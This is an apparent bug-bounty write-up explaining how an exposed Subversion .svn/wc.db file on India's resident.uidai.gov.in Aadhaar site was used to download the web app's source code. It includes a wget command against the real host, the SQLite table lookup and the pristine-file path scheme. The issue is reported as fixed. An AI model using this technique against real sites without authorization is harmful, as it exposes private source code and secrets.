India’s Aadhar card source code disclosure via exposed .svn/wc.db
2023-1-15 11:5:43 Author: infosecwriteups.com(查看原文) 阅读量:29 收藏

Hi Guys, I recently found a .svn/wc.db folder exposed on a resident.uidai.gov.in, and used it to reconstruct the Web app’s source code. I cannot find any article about svn, So this will be very useful for those who find svn on a website.

what is .svn/wc.db?

The .svn/wc.db file is a database file used by Subversion, a version control system and it contains information about the state of the working copy, including the revision numbers of the files, the dates and times when they were last updated, and any local modifications that have been made. It is used by Subversion to track changes to the files in the working copy and to manage the process of merging changes from the repository into the working copy.

what is the Difference between .svn/wc.db and .git ?

.svn/wc.db is a database file used by Subversion, a centralized VCS

.git, on the other hand, is a database file used by Git, a distributed VCS

Note: I haven’t used any directory or file brute-forcing. I used a chrome extension called DotGit which automatically finds .git and .svn in a website while surfing.

Let's Look at How I downloaded all the source codes of an Aadhar website

I just appended .svn/wc.db to https://resident.uidai.gov.in and downloaded the database file

wget https://resident.uidai.gov.in/.svn/wc.db

when I opened the database file with SQLite browser. I came occurs a lot of tables.

sqlitebrowser wc.db

The nodes table contains many columns but 2 important columns are “local_relpath” and “checksum”

local_relpath →It contains the path of a web app

checksum → It contains a checksum value of the path

For Example:

local_relpath = /Bio-Lock-Enable.php

checksum = $sha1$c7fb9f76455733203cb734de0c6016366d729458

I know that SVN keeps a backup copy of all files in a one location

.svn/pristine/<XX>/<CHECKSUM>.svn-base
  1. CHECKSUM is Sha1 sum of the file (remove $sha1$)
  2. XX is the first two characters of CHECKSUM.
https://resident.uidai.gov.in/.svn/pristine/c7/c7fb9f76455732203cb734de0c6016366d729428.svn-base

It is easy to download a single file with wget command. but I have more than 500 paths.so I wrote a simple script to download all the source code.

link to the below code ↓

https://gist.github.com/0xLittleSpidy/d57446737071f119f452d5bc95721864

script to download all the source code
Downloaded source code

Finally, I got the complete source code of the Aadhar website.

The Indian government has fixed the issue and I encourage ethical hacking practices.

Here are some more good resources:

Special thanks to Dinesh Kumar for guiding me.

Thanks for taking the time to read my write-up.

Want to Connect? Please consider following me on Medium, and Twitter, connecting with me on LinkedIn, or buying me a coffee!


文章来源: https://infosecwriteups.com/indias-aadhar-card-source-code-disclosure-via-exposed-svn-wc-db-c05519ea7761?source=rss----7b722bfd1b8d--bug_bounty
如有侵权请联系:admin#unsafe.sh